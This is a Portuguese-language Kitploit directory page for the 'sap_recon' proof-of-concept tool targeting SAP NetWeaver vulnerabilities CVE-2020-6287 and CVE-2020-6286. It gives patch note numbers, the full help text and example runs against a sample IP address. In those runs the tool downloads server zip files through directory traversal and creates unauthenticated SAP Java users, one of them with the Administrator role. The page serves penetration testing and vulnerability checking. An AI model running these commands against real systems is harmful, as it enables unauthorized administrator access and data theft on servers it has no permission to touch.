Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SAP_RECON — PoC para CVE-2020-6287, CVE-2020-6286 (vulnerabilidade SAP RECON) | Kitploit
Ferramentas/GitHubGitHub/chipik/sap_recon
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubchipik/sap_recon

SAP_RECON

PoC para CVE-2020-6287, CVE-2020-6286 (vulnerabilidade SAP RECON)

Ver Repositório
223632há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC para CVE-2020-6287, CVE-2020-6286 (vulnerabilidade SAP RECON)

Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Caras, a sério? Foi o melhor nome que arranjaram? :)

Este script permite verificar a vulnerabilidade de falta de verificação de autorização no SAP LM Configuration Wizard e, como PoC, explora o directory traversal no método queryProtocol.

O directory traversal permite descarregar qualquer ficheiro zip do servidor SAP.

Este projeto foi criado apenas para fins educativos e não pode ser utilizado para violação da lei ou ganho pessoal.
O autor deste projeto não é responsável por qualquer dano possível causado pelos materiais deste projeto

Descoberta original:

CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.

Solução: #2934135, #2939665

Como usar

Apenas indique o hostname/ip do SAP NW AS Java.

Existem opções adicionais:

  1. -c - verificar se o servidor SAP é vulnerável ao RECON
  2. -f - descarregar ficheiro zip do servidor SAP
  3. -u - criar utilizador SAP JAVA com a função
Baixar ferramenta
Authenticated User
  • -a - criar utilizador SAP JAVA com a função Administrator
  • Ex.: Descarregar ficheiro zip

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -f /1111.zip
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Ok! File zipfile_929.zip was saved
    

    Ex.: Criar utilizador SAP JAVA

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -u
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user. sapRpoc5484:Secure!PwD9379
    Ok! User were created
    

    Ex.: Criar utilizador Administrador SAP JAVA

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -a
    Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
    Ok! Admin user were created
    

    Todas as opções

    root@kitploit:~
    ~python RECON.py -h
    usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                    [-u] [-a] [--timeout TIMEOUT] [-v]
    
    PoC for CVE-2020-6287,  (RECON)
    This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
    Original finding:
    - Pablo Artuso. https://twitter.com/lmkalg
    - Yvan 'iggy' G https://twitter.com/_1ggy
    
    Thanks:
    - Spencer McIntyre https://twitter.com/zeroSteiner
    
    Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
    
    optional arguments:
      -h, --help            show this help message and exit
      -H HOST, --host HOST  Java NW host (default: 127.0.0.1)
      -P PORT, --port PORT  Java NW web port (default: tcp/50000)
      -p PROXY, --proxy PROXY
                            Use proxy (ex: 127.0.0.1:8080)
      -s, --ssl             enable SSL
      -c, --check           just detect vulnerability
      -f ZIPFILE, --zipfile ZIPFILE
                            ZIP file to read. CVE-2020-6286
      -u, --user            Create simple JAVA user. CVE-2020-6287
      -a, --admin           Create JAVA user with role "Administrator". CVE-2020-6287
      --timeout TIMEOUT     HTTP connection timeout in second (default: 10)
      -v, --verbose         verbose mode